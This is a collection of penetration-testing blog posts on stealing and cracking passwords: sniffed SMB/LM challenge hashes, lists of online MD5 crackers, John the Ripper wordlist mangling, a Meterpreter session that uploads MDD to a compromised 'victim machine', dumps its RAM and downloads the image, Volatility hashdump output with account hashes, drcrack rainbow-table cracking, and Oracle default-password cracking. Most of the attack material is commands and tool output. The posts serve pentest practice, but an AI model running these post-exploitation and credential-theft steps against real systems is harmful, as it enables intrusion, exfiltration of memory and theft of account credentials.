Revisiting HALFLM Stuff

I covered some of the halflm challenge sniffing stuff in a previous post.

but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.

so here are some updated links.

where to grab the tables:

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/

where to grab the program:

http://sourceforge.net/projects/rcracki/

Some gotchas I ran into on the last PT was some reason getting odd hashes in the SMB and NTLM sniffing modules.

in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get smb_login scanned, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5

Various Online Password Crackers

Just a list of online (mostly) md5 crackers but some with do others

This post over on pcsec got me thinking about them.

http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html

Of course not all those are working, least not for me.

So here is that list with links and a few others thanks to my twitter homies

passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
hackcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/

Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.

Sites specifically mentioned to me in no particular order

Plain-Text.info http://plain-text.info/add/ (also has IRC support)
Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)
PassCracking http://passcracking.com/

For fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.

Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com...
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

link:

http://carnal0wnage.attackresearch.com/sites/default/files/md5check_md5crack.txt (rename to .rb)

I started to do more than just md5crack but writing regex's for different sites just seemed like a waste of time.

Creating wordlists with JTR

(mirrored from carnal0wnage.attackresearch.com)

Nothing new, probably covered else where but useful to revisit (maybe)...at least for my notes.

We had to try to bruteforce the ColdFusion admin password on a past pentest (more on that in another post--still testing the new MSF ColdfFusion modules). After trying my popular passwords (short) list I came nil so decided to use some words from the site we were trying to break into and use john to mangle the list up for some additional passwords to try.

you start with you initial list of words (you can also use CeWL http://www.digininja.org/projects/cewl.php to generate a site specific wordlist for you)

you then throw them into John and have the rules file mangle them.

yomoma@c0:~/pentest/john/run$ ./john --wordlist=/tmp/passwords-startwith.lst --rules --stdout | ./unique /tmp.passwords-mangled.lst

started with:

blah
carnal
0wnage
carnal0wnage
carnalownage

ended up with 159 words (it dropped the carnal0wnage after the upcase, not sure why) based on the default word mangling rules with john (that may or may not be that useful to you).

that's where JTR Config Maker from http://reusablesec.googlepages.com/jtrconfiggenerator can come in handy.

specifically " -Option (3) allows you to create word mangling rules. For example, add two numbers to the end of the dictionary word, and replace ‘a’ with an ‘@’."

so i F'ed with it for awhile and came up with a pretty good list i thought that was better than the default rules. You can pretty much set any type of mangle rule you want, save the rules file and even export out your john.conf to use so you can generate your password list like above.

If people are interested in more detail on this process let me know via comments.

Dumping Memory to Extract Password Hashes

Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from: http://pauldotcom.com/wiki/index.php/Episode142

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:

C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt, really doesnt matter as we are going to be pulling down 256+ MB of data we wont exactly be "stealthy"

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

Now that we have our .dd image locally you can utilize instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the passwords out of memory.

Volatility --> https://www.volatilesystems.com/default/volatility

Installation and getting started: Download and unzip volatility from the above location, download and install the patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html --> http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once you are done when you run python volatility you should have the hivescan/hivelist options as well as other stuff.

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry
memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Couple of updates

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/

Dictionary Based Rainbow Tables with Dr-crack

After Matt Weir's shmoocon talk I got motivated to generate and play with some dictionary based rainbow tables with Dr-crack. Why... I don't know, I pass the hash for everything now, and

"Dictionary based rainbow tables, such as those generated by drcrack, on the other hand allow you to create pre-generated hash tables based on dictionary words and common word mangling rules, such as "P@ssword12".

Plus it's less "magic" when I say I cracked the passwords versus just passing the hash, passing the hash still seems to be magic to alot of people. Plus, as Matt Carpenter pointed out to me, you cant log into Terminal Services/RDP with a hash :-)

So I went to the website and downloaded the .tar, extracted, and typed make all and got the following error.

cg@notBT:~/evil/drcrack/shmoocon_submit$ make all make: *** No rule to make target `Public.o', needed by `drtgen'. Stop.

The issue ended up being public.cpp which needed to be named Public.cpp. rename the file and you should be good to go.

You can run ./dr_rules to alter either the basic_rules file or the keyboard_rules file but to get started I just used the default keyboard rules, dictionary, and table that they generated.

I changed a password in a VM to a keyboard combo (but still a 10 character password) that I was sure was in the dictionary and dumped the hashes.

then I ran the tool: (usage was here: http://reusablesec.googlepages.com/drcrack)

cg@notBT:~/evil/drcrack/shmoocon_submit$ ./drcrack -d /home/cg/evil/drcrack/keyboard_basic/keyboard_map.cfg -h 0D757AD173D2FC249CE19364FD64C8EC
keyboard_map.cfg:
Hash=ntlm...
index=0
ChainLen=2400
ChainCount=5000000
RainbowTable=/home/cg/evil/drcrack/keyboard_basic/keyboard_map.rt
Dictionary=/home/cg/evil/drcrack/keyboard_basic/keyboard_dic.txt
ManglingRules=/home/cg/evil/drcrack/keyboard_basic/keyboard.rules
NEWRULES IS TRUE
Processing mangling rules
special=[>!@#$%^&*()_+\-=?.,/\\":; ] size=26
lower=[abcdefghijklmnopqrstuvwxyz] size=26
upper=[ABCDEFGHIJKLMNOPQRSTUVWXYZ] size=26
number=[0123456789] size=10
Reading in the dictionary
Dictionary Size = 658
Calculating rule and index size
Figuring out Rule Size
Index Size for rule 0 is=658
Index Size for rule 1 is=432964
Index Size for rule 2 is=284890312
the total Size=285323934
reading chunk...
83888 bytes read, disk access time: 0.00 s
verifying the file...
searching for 1 hash...
cryptanalysis time: 6.93 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.25 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.38 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.12 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.04 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.14 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.02 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.01 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.06 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.70 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.22 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 0d757ad173d2fc249ce19364fd64c8ec is qwertyuiop
cryptanalysis time: 0.03 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 0.00 s
total cryptanalysis time: 9.40 s
total chain walk step: 2876401
total false alarm: 1451
total chain walk step due to false alarm: 1253346

result
-------------------------------------------------------
0d757ad173d2fc249ce19364fd64c8ec qwertyuiop hex:71776572747975696f70


Overall not bad, in less than 10 seconds I found a password that would have been in a pretty big NTLM table otherwise.

I'm sure more posts are forthcoming...

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...

Oracle Pwnage Part 3

Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5